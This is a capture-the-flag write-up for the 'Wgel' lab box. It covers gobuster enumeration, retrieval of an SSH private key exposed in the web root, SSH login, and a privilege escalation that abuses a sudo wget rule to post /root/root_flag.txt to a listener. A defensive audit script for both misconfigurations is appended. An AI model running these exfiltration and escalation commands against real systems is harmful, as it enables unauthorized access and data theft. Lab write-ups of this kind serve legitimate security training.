Wgel CTF
Box description: Can you exfiltrate the root flag?
Box tag: security
Nmap scan of open ports
Ports 80 and 22 are open.
Visiting port 80 shows the Apache default page.
Scanned the site directories with dirbuster and visited each one, but found nothing exploitable.
There must be directories it missed.
gobuster dir -u http://10.10.237.25/sitemap -w /usr/share/wordlists/dirb/common.txt -x "html,php,txt"
Found an SSH private key directory, /.ssh
root@kali:~# gobuster dir -u http://10.10.228.218/sitemap/ -w /usr/share/wordlists/dirb/common.txt -x "html,php,txt"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.228.218/sitemap/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2020/07/10 15:08:36 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.ssh (Status: 301)
/about.html (Status: 200)
/blog.html (Status: 200)
/contact.html (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/services.html (Status: 200)
/shop.html (Status: 200)
/work.html (Status: 200)
===============================================================
2020/07/10 15:13:17 Finished
===============================================================
root@kali:~#
Take a look at it.
Use wget to download the private key; copy-pasting it does not work.
wget http://10.10.228.218/sitemap/.ssh/id_rsa
Have the private key but no username - -
After a long search, found the username jessie in an HTML comment on the Apache default page.
Try logging in over SSH; before that, change the private key's permissions to 600 (owner read/write).
chmod 600 id_rsa
ssh -i id_rsa jessie@10.10.228.218
Once in, look for the user flag.
find / -type f -name "*user*" 2>/dev/null
Found user_flag.txt
Privilege escalation
sudo -l shows only the wget command (forgot to take a screenshot).
wget's --post-file parameter can be used to send root_flag.txt (I'm guessing that's the name) to a chosen IP.
Listen with nc
nc -lvp 80
sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.1.87.167
The flag comes back successfully.
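Both weaknesses this box relies on, a private key served from the web root and a sudo rule for wget, can be caught by a small host audit. This is an added example, not part of the original writeup; the web root, sudoers path and the sample sudoers line it builds are constructed.

```shell
#!/bin/sh
# Added defender-side audit, not from the original writeup. It checks for the two
# misconfigurations the box depends on. All paths and sample lines are constructed.

# List private key material below a web root: any file under a .ssh directory,
# or a standard id_* key file anywhere in the tree.
find_exposed_keys() {
  find "$1" -type f \( -path '*/.ssh/*' -o -name 'id_rsa' -o -name 'id_ed25519' \) 2>/dev/null | sort
}

# List non-comment sudoers lines that grant wget. wget can read any file as root
# via --post-file / --input-file and write files via -O, so such a rule is root.
sudo_wget_rules() {
  grep -E '^[^#]*[[:space:]/]wget([[:space:]]|$)' "$1" || true
}

# Build a constructed sample tree (a served .ssh/id_rsa and a sudoers file with a
# NOPASSWD wget rule) and run both checks against it.
demo() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/www/sitemap/.ssh" "$tmp/www/css"
  printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed' > "$tmp/www/sitemap/.ssh/id_rsa"
  printf '%s\n' 'body{}' > "$tmp/www/css/style.css"
  printf '%s\n' '# constructed sudoers sample' 'root ALL=(ALL:ALL) ALL' \
    'jessie ALL=(root) NOPASSWD: /usr/bin/wget' > "$tmp/sudoers"
  printf 'exposed key(s):\n%s\n' "$(find_exposed_keys "$tmp/www")"
  printf 'sudo wget rule(s):\n%s\n' "$(sudo_wget_rules "$tmp/sudoers")"
  rm -rf "$tmp"
}

demo
```

On a real host, point find_exposed_keys at the document root (e.g. /var/www/html) and sudo_wget_rules at /etc/sudoers and each file under /etc/sudoers.d.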